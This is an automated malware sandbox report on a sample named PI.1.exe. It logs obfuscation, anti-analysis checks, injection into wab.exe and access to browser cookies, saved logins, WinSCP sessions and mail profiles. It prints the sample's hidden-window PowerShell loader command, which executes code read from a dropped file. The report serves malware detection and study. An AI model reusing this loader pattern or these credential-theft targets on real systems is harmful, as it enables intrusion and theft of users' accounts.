Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007BCF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbK source: powershell.exe, 00000003.00000002.1570017058.0000000008B15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000003.00000002.1561312536.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1569685053.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000003.00000002.1561312536.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbE source: powershell.exe, 00000003.00000002.1567339564.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1561312536.000000000344D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000003.00000002.1570733710.0000000009690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0 Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities)
Source: C:\Users\user\Desktop\PI.1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0514B4A8 pushad ; iretd 3_2_0514B501
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E1D5D pushad ; ret 3_2_095E1D5E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E275B push cs; ret 3_2_095E2789
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E234A push edi; iretd 3_2_095E234B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E2747 push cs; ret 3_2_095E2789
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E27DB push cs; ret 3_2_095E2789
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E31B7 push ecx; iretd 3_2_095E31B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E0873 push esi; iretd 3_2_095E0876
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E14F6 push edx; retf 3_2_095E14F7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E0A8C push 09C4B4A3h; iretd 3_2_095E0A97
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E28A7 push ecx; retf 3_2_095E28CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE27DB push cs; ret 13_2_03CE2789
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE31B7 push ecx; iretd 13_2_03CE31B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE234A push edi; iretd 13_2_03CE234B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE2747 push cs; ret 13_2_03CE2789
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE1D5D pushad ; ret 13_2_03CE1D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE275B push cs; ret 13_2_03CE2789
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE14F6 push edx; retf 13_2_03CE14F7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE0A8C push 09C4B4A3h; iretd 13_2_03CE0A97
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE28A7 push ecx; retf 13_2_03CE28CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE0873 push esi; iretd 13_2_03CE0876
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205BA1A0 push esp; ret 13_2_205BA1A1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205B0C3D push edi; ret 13_2_205B0CC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe Jump to dropped file
Source: C:\Users\user\Desktop\PI.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 205B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 206C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 226C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7436 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1853 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 1467 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 8360 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -24903104499507879s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7604 Thread sleep count: 1467 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99873s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7604 Thread sleep count: 8360 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99765s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -199312s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99547s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99437s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99327s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99218s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99109s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98999s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98890s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98781s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98671s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98562s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98453s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98343s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98234s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98124s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98015s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97906s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97796s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97687s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97578s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97468s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97359s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97250s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97140s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -97031s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96921s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96812s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96703s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96593s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96484s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96374s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96265s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96156s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -96046s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -95937s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -95828s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99766s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99438s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99313s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99203s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -99094s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98969s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7624 Thread sleep time: -98860s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040635D FindFirstFileW,FindClose, 0_2_0040635D
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040580B
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99873
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99656
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99547
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99437
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99327
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99218
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99109
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98999
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98890
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98781
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98671
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98562
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98453
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98343
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98234
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98015
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97906
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97796
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97687
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97578
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97468
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97359
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97140
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97031
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96921
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96812
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96703
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96593
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96484
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96374
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96265
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96046
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95937
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95828
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99875
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99766
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99438
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99313
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99203
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99094
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98969
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98860
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\dyrekllers\
Source: wab.exe, 0000000D.00000002.2515992871.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$:
Source: wab.exe, 0000000D.00000002.2515992871.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wab.exe, 0000000D.00000002.2515992871.0000000004AEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@k
Source: C:\Users\user\Desktop\PI.1.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PI.1.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CE0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A7FB04
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040326A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000D.00000002.2529559166.0000000020711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2529559166.0000000020737000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2529559166.000000002074C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7712, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 0000000D.00000002.2529559166.0000000020711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7712, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000000D.00000002.2529559166.0000000020711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2529559166.0000000020737000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2529559166.000000002074C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7712, type: MEMORYSTR